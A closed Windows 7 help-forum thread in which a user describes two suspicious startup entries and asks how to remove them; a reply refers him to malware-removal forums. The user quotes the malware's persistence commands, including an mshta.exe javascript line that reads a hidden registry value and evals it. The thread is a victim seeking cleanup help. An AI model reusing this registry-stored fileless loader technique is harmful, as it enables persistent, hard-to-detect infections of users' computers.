• All Community
    • All Community
    • Forums
    • Ideas
    • Blogs
Advanced

Not what you are looking for? Ask the experts!

This forum thread needs a solution.
Kudos0

Windows 7 Startup Menu files

Two files appear in the windows startup menu. I'm sure their names are random but the code they run is below.

"8df70" runs this call: 

C:\Windows\system32\mshta.exe "javascript:C3AOr="zf3c";s45d=new ActiveXObject("WScriptShell");WevUDh2="V084";f2l4Kk=s45d.RegRead("HKCU\\software\\jexxwhetje\\mpjq");aF7cPe4U="QEeMsj";eval(f2l4Kk);S7hma="4";"

"034f6" runs this code using a file in a directory inside the User's area:

C:\Windows\System32\cmd.exe /C start "" "C:\Users\User\AppData\Roaming\0e7ad\6e5b2.10ca43" 

The file in the user's area will immediately replicate itself if deleted or altered. I've seen this behavior in adware, back in the old days.

Any idea how to clean this? Norton Insight doesn't help since cmd.exe and mshta.exe are Windows executables.

Thanks,

Craig

Replies

Kudos0

Re: Windows 7 Startup Menu files

Hi @CraigD

Please go to one of these free Forums for help in removing your malware.Please share the output of the malware analysis with us if you don't mind

http://www.bleepingcomputer.com(link is external)
http://www.geekstogo.com/forum/(link is external)
http://www.cybertechhelp.com/forums/(link is external)
http://forums.whatthetech.com/(link is external)
 

This thread is closed from further comment. Please visit the forum to start a new thread.